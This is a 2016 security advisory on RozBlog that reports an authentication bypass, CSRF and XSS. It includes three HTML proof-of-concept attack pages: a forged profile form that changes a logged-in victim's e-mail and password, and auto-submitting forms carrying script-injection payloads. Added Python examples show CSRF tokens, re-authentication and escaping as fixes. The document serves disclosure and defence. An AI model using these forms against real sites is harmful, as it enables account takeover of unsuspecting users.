Document Title:
===============
RozBlog Weblog Service - Authentication Bypass / Cross Site Request Forgery / Cross Site Scripting
References (Source):
====================
http://ehsansec.ir/advisories/rozblog-xsrf-xss-bypass.txt
Release Date:
=============
2016-02-23
Product & Service Introduction:
===============================
RozBlog is one of the most popular blogging services; it has many
special features that give you an interesting blogging experience.
Vulnerability Type:
=========================
Authentication Bypass
Cross Site Request Forgery
Cross Site Scripting
Vulnerability Details:
==============================
I discovered an authentication bypass (the e-mail address can be
changed without re-entering the current password), a client-side
cross-site request forgery vulnerability and a cross-site scripting
vulnerability in RozBlog.com (Weblog Service).
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Proof of Concept (PoC):
=======================
-- Cross Site Request Forgery & Authentication Bypass --
-- PoC 1 --
-- To change the e-mail address a user must first enter the old password
on a separate page. The Edit_Profile request below is accepted without
that step, and since it carries no anti-CSRF token it can be submitted
from an attacker's page against a logged-in victim, setting the e-mail
(and the password field) to attacker-chosen values. --
<html>
<head>
<title>Authentication Bypass - Csrf</title>
</head>
<body>
<form action="http://news.rozblog.com/Edit_Profile" method="post">
<input type="text" name="email" value="hacker@mail.com" >
<input type="text" name="name" value="Ehsan">
<input type="text" name="age" value="10">
<input type="text" name="site" value="http://ehsansec.ir/">
<input type="text" name="country" value="Country">
<input type="text" name="city" value="IRan">
<input type="text" name="about" value="About User">
<input type="text" name="yahoo" value="Yahoo Id">
<input type="text" name="password" value="123@abc">
<input type="submit" name="edit_profile" value="Attack">
</form>
</body>
</html>
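The two server-side checks that PoC 1 shows to be absent, as an added example that is not part of the original advisory and not RozBlog's code: a per-session synchronizer token that a form on another origin cannot read, and re-authentication with the current password in the same request that changes the e-mail or password. The in-memory USERS and SESSIONS stores, the csrf_token and current_password field names and the PBKDF2 parameters are all assumptions made for illustration; only the field names email, name, age, password and edit_profile come from the PoC form.

```python
import hashlib
import hmac
import os
import secrets

# Constructed in-memory stand-ins for the site's user table and session
# store; their shape is an assumption for this example, not RozBlog's code.
USERS = {}     # username -> {"email": str, "salt": bytes, "pw_hash": bytes}
SESSIONS = {}  # session id -> {"user": str, "csrf": str}


def _hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2 parameters are illustrative.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def create_user(username: str, email: str, password: str) -> None:
    salt = os.urandom(16)
    USERS[username] = {"email": email, "salt": salt,
                       "pw_hash": _hash_password(password, salt)}


def login(username: str) -> str:
    """Start a session and mint a random per-session anti-CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token(sid: str) -> str:
    """The token the legitimate Edit_Profile page embeds as a hidden field.
    A page on another origin cannot read it, so a forged form cannot send it."""
    return SESSIONS[sid]["csrf"]


def edit_profile(sid: str, form: dict) -> tuple:
    """Hardened Edit_Profile handler; returns (ok, reason)."""
    sess = SESSIONS.get(sid)
    if sess is None:
        return False, "not logged in"
    user = USERS[sess["user"]]

    # Check 1: synchronizer token, compared in constant time.
    supplied = str(form.get("csrf_token", "")).encode("utf-8")
    if not hmac.compare_digest(supplied, sess["csrf"].encode("utf-8")):
        return False, "csrf token missing or wrong"

    # Check 2: credential-affecting fields require the current password in
    # this same request, so the old-password page cannot simply be skipped.
    if "email" in form or "password" in form:
        current = str(form.get("current_password", ""))
        if not hmac.compare_digest(_hash_password(current, user["salt"]),
                                   user["pw_hash"]):
            return False, "current password required"

    # Only now apply the change.
    if "email" in form:
        user["email"] = form["email"]
    if "password" in form:
        user["salt"] = os.urandom(16)
        user["pw_hash"] = _hash_password(form["password"], user["salt"])
    return True, "profile updated"


def replay_poc1() -> tuple:
    """Replay the PoC 1 form body against the hardened handler three times:
    as submitted from the attacker's page, with a token but no password,
    and as the legitimate profile page would submit it."""
    USERS.clear()
    SESSIONS.clear()
    create_user("victim", "victim@example.com", "correct horse battery")
    sid = login("victim")
    # Field names and values taken from the advisory's PoC 1 form.
    forged = {"email": "hacker@mail.com", "name": "Ehsan", "age": "10",
              "password": "123@abc", "edit_profile": "Attack"}
    forged_result = edit_profile(sid, forged)
    token_only = edit_profile(sid, {**forged, "csrf_token": csrf_token(sid)})
    legitimate = edit_profile(sid, {**forged, "csrf_token": csrf_token(sid),
                                    "current_password": "correct horse battery"})
    return forged_result, token_only, legitimate, USERS["victim"]["email"]


if __name__ == "__main__":
    for label, result in zip(("forged", "token only", "legitimate", "email now"),
                             replay_poc1()):
        print(f"{label:11}: {result}")
```

Checking the old password on a separate page, as the advisory describes the real site doing, is not enough on its own: unless the server binds that step to the Edit_Profile request that follows (here by demanding the password in the same POST; a short-lived server-side re-authentication flag works as well), an attacker can go straight to the second request, which is exactly what PoC 1 does.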
-- PoC 2 --
<html>
<head>
<title>XSS - Csrf</title>
</head>
<body onload="document.contactfrm.submit()">
<form action="http://news.rozblog.com/Forum/Send/Message/"
name="contactfrm" method="post">
<input type="text" name="singer" value='"><img src=x onerror=alert(1)>'>
<input type="text" name="subject" value='"><img src=x onerror=alert(2)>'>
<input type="text" name="message" value='"></textarea><img src=x onerror=alert(3)>'>
</form>
</body>
</html>
-- PoC 3 --
-- Cross Site Scripting --
-- For the action attribute, use the address of a weblog or one of the rozblog.com domains. --
<html>
<head>
<title>Cross Site Scripting</title>
</head>
<body onload="document.info.submit()">
<form action='http://rozblog.com/View_Temp' method='POST'
name='info'>
<input name="c" id="c" value="2" type="hidden">
<input name='themecode' value="<script>alert('Ehsan')</script>">
</form>
</body>
</html>
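Both XSS findings reflect attacker-controlled input into HTML without encoding: the PoC 2 payloads close an attribute value or the textarea, and PoC 3 injects a script element through themecode. The following is an added example, not the advisory's or RozBlog's code. It renders the PoC 2 fields by plain concatenation (an assumption about the Send/Message page's markup) beside a version that HTML-escapes each value for its context, and uses the standard library's HTML parser to show which tags each rendering actually produces. The payloads are copied from PoC 2 and PoC 3.

```python
import html
from html.parser import HTMLParser

# Payloads copied verbatim from PoC 2 and PoC 3 of the advisory.
POC2_SUBJECT = '"><img src=x onerror=alert(2)>'
POC2_MESSAGE = '"></textarea><img src=x onerror=alert(3)>'
POC3_THEMECODE = "<script>alert('Ehsan')</script>"


def render_vulnerable(subject: str, message: str) -> str:
    """Reflect the fields by plain concatenation. The exact markup of the
    Send/Message page is an assumption; the attribute and textarea contexts
    are the ones the PoC 2 payloads are built to break out of."""
    return ('<input type="text" name="subject" value="' + subject + '">\n'
            '<textarea name="message">' + message + '</textarea>')


def render_safe(subject: str, message: str) -> str:
    """Same markup, each untrusted value HTML-escaped for its context.
    html.escape(quote=True) encodes & < > " and ', which covers both a
    double-quoted attribute value and element text."""
    return ('<input type="text" name="subject" value="'
            + html.escape(subject, quote=True) + '">\n'
            '<textarea name="message">' + html.escape(message, quote=True)
            + '</textarea>')


def render_preview_safe(themecode: str) -> str:
    """Show submitted template code as text rather than executing it.
    Only appropriate where the preview is meant to be read, not rendered."""
    return '<pre>' + html.escape(themecode, quote=True) + '</pre>'


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup: str) -> list:
    """Return the start tags of the markup; an attacker-controlled value
    that escaped its context shows up here as an extra tag."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    print("vulnerable:", tags_in(render_vulnerable(POC2_SUBJECT, POC2_MESSAGE)))
    print("safe:      ", tags_in(render_safe(POC2_SUBJECT, POC2_MESSAGE)))
    print("raw theme: ", tags_in(POC3_THEMECODE))
    print("preview:   ", tags_in(render_preview_safe(POC3_THEMECODE)))
```

Escaping is the right fix for Send/Message, where the values are plain text. View_Temp is a different case: a template preview has to render user-supplied HTML, so escaping would break the feature. The usual mitigation there is to serve the preview from a separate, cookieless origin (or in a sandboxed iframe with a restrictive Content-Security-Policy) so that injected script never runs with a rozblog.com session; that is a general recommendation, not something the advisory states.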
Author:
==================
Ehsan Hosseini
http://ehsansec.ir/
Special thanks to:
===========
Bl4ck_mohajem
Alireza
Contact:
========
hehsan979@gmail.com
info@ehsansec.ir